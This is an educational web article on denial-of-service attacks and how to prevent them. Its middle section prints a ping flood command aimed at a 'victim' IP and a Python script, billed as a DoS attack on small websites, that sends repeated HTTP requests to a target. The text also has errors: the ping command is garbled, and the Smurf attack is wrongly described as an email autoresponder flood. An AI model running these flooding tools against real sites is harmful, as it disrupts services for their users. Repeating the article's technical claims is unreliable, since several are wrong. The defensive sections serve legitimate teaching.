Denial of Service and Prevention

Denial of Service (DoS) is a cyber-attack on an individual Computer or Website with the intent to deny services to intended users. Their purpose is to disrupt an organization's network operations by denying access to its users. Denial of service is typically accomplished by flooding the targeted machine or resource with surplus requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled. For example, if a bank website can handle 10 people a second by clicking the Login button, an attacker only has to send 10 fake requests per second to make it so no legitimate users can log in. DoS attacks exploit various weaknesses in computer network technologies. They may target servers, network routers, or network communication links. They can cause computers and routers to crash and links to bog down. The most famous DoS technique is the Ping of Death. The Ping of Death attack works by generating and sending special network messages (specifically, ICMP packets of non-standard sizes) that cause problems for systems that receive them. In the early days of the Web, this attack could cause unprotected Internet servers to crash quickly. It is strongly recommended to try all described activities on virtual machines rather than in your working environment. 

Following is the command for performing flooding of requests on an IP.

ping ip_address –t -65500

HERE,

• "ping" sends the data packets to the victim.
• "ip_address" is the IP address of the victim.
• "-t" means the data packets should be sent until the program is stopped.
• "-l(65500)" specifies the data load to be sent to the victim.

Other basic types of DoS attacks involve.

• Flooding a network with useless activity so that genuine traffic cannot get through. The TCP/IP SYN and Smurf attacks are two common examples.
• Remotely overloading a system's CPU so that valid requests cannot be processed.
• Changing permissions or breaking authorization logic to prevent users from logging into a system. One common example involves triggering a rapid series of false login attempts that lockout accounts from being able to log in.
• Deleting or interfering with specific critical applications or services to prevent their normal operation (even if the system and network overall are functional).

Another variant of the DoS is the Smurf attack. This involves emails with automatic responses. If someone emails hundreds of email messages with a fake return email address to hundreds of people in an organization with an autoresponder on in their email, the initially sent messages can become thousands sent to the fake email address. If that fake email address belongs to someone, this can overwhelm that person's account. DoS attacks can cause the following problems:

• Ineffective services
• Inaccessible services
• Interruption of network traffic
• Connection interference

Following is the Python script for performing a denial of service attack for a small website that didn't expect so much socket connection. 

# Please note that running this code might
# cause your IP to be blocked by the server. The purpose
# of this code is purely for learning purposes.
import socket
import sys
import os

print("][ Attacking " + sys.argv[1] + " ... ][")
print("injecting " + sys.argv[2])

def attack():
    #pid = os.fork() 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], 80))
    print(">> GET /" + sys.argv[2] + " HTTP/1.1")
    s.send(("GET /" + sys.argv[2] + " HTTP/1.1\r\n").encode())
    s.send(("Host: " + sys.argv[1] + "\r\n\r\n").encode())
    s.close()

# Driver code
for i in range(1, 1000):
    attack()

We can use the above code as

python ddos.py target_ip_address apache

How Do DoS Attacks Work?

DoS attacks typically exploit vulnerabilities in a target's network or computer systems. Attackers can use a variety of methods to generate overwhelming traffic or requests, including:

1. Flooding the target with a massive amount of data
2. Sending repeated requests to a specific part of the system
3. Exploiting software vulnerabilities to crash the system

Prevention Given that Denial of Service (DoS) attacks are becoming more frequent, it is a good time to review the basics and how we can fight back.

• Cloud Mitigation Provider - Cloud mitigation providers are experts at providing DDoS mitigation from the cloud. This means they have built out massive amounts of network bandwidth and DDoS mitigation capacity at multiple sites around the Internet that can take in any type of network traffic, whether you use multiple ISP’s, your own data center, or any number of cloud providers. They can scrub the traffic for you and only send “clean” traffic to your data center.
• Firewall - This is the simplest and least effective method. Python scripts are often written to filter out malicious traffic, or existing firewalls can be utilized by enterprises to block such traffic.
• Internet Service Provider (ISP) - Some enterprises use their ISP to provide DDoS mitigation. These ISPs have more bandwidth than an enterprise would, which can help with large volumetric attacks.

 Features to help mitigate these attacks:

Network Segmentation: Segmenting the network can help prevent a DoS attack from spreading throughout the entire network. This limits the impact of an attack and helps to isolate the affected systems.

Implement Firewalls: Firewalls can help prevent DoS attacks by blocking traffic from known malicious IP addresses or by limiting the amount of traffic allowed from a single source.

Use Intrusion Detection and Prevention Systems: Intrusion Detection and Prevention Systems (IDS/IPS) can help to detect and block DoS attacks by analyzing network traffic and blocking malicious traffic.

Limit Bandwidth: Implementing bandwidth limitations on incoming traffic can help prevent a DoS attack from overwhelming the network or server.

Implement Content Delivery Network (CDN): A CDN can help to distribute traffic and reduce the impact of a DoS attack by distributing the load across multiple servers.

Use Anti-Malware Software: Anti-malware software can help to detect and prevent malware from being used in a DoS attack, such as botnets.

Perform Regular Network Scans: Regular network scans can help identify vulnerabilities and misconfigurations that can be exploited in a DoS attack. Patching these vulnerabilities can prevent a DoS attack from being successful.

Develop a Response Plan: Having a DoS response plan in place can help minimize the impact of an attack. This plan should include steps for identifying the attack, isolating affected systems, and restoring normal operations.

To safeguard from these attacks you have to apply secure coding and design strong architecture which can prevent these kinds of attacks and update day-to-day solutions to bugs on your website. References https://owasp.org/www-community/attacks/Denial_of_Service https://en.wikipedia.org/wiki/Denial-of-service_attack